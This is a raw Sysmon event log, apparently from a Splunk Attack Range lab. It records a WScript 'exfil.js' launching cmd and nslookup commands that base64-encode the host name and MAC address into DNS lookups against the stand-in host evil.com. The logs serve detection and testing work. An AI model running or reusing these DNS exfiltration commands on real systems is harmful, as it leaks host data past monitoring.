14:16:15.989{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043919Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:16.276{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1F0E036CC8A231B049BAF04C2EBC4F9,SHA256=BDAA1AE51F2ECF7FBAD8F1328FA988964D434472C2F0F4CD5ED5493E932A3B6B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.966{2E1864BB-17B1-629A-E63E-000000005F02}76683308C:\Windows\system32\conhost.exe{2E1864BB-17B1-629A-E73E-000000005F02}5400C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.950{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.950{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.950{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.950{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.934{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-E73E-000000005F02}5400C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.934{2E1864BB-17B1-629A-E53E-000000005F02}49248124C:\Windows\system32\cmd.exe{2E1864BB-17B1-629A-E73E-000000005F02}5400C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.949{2E1864BB-17B1-629A-E73E-000000005F02}5400C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B1-629A-E53E-000000005F02}4924C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgnag.tmp 2>&1 10341000x8000000000000000196786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.912{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B1-629A-E63E-000000005F02}7668C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.912{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B1-629A-E63E-000000005F02}7668C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.912{2E1864BB-17B1-629A-E63E-000000005F02}76683308C:\Windows\system32\conhost.exe{2E1864BB-17B1-629A-E53E-000000005F02}4924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.912{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-E63E-000000005F02}7668C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.896{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-E53E-000000005F02}4924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.896{2E1864BB-17A1-629A-783D-000000005F02}55524708C:\Windows\System32\WScript.exe{2E1864BB-17B1-629A-E53E-000000005F02}4924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.896{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.896{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.896{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.896{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.904{2E1864BB-17B1-629A-E53E-000000005F02}4924C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgnag.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.881{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltkd.tmpMD5=B16E2386D2E39F09BDE969D627970342,SHA256=797A98F63D6E57D0F6A3377DF2DF1B9F1EDDED7E98D9A5F6DC7382913541E075,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.865{2E1864BB-17B1-629A-E33E-000000005F02}23168020C:\Windows\system32\conhost.exe{2E1864BB-17B1-629A-E43E-000000005F02}884C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.865{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.865{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.865{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.865{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.865{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-E43E-000000005F02}884C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.865{2E1864BB-17B1-629A-E23E-000000005F02}74845976C:\Windows\system32\cmd.exe{2E1864BB-17B1-629A-E43E-000000005F02}884C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.869{2E1864BB-17B1-629A-E43E-000000005F02}884C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B1-629A-E23E-000000005F02}7484C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltkd.tmp 2>&1 10341000x8000000000000000196766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.849{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B1-629A-E33E-000000005F02}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 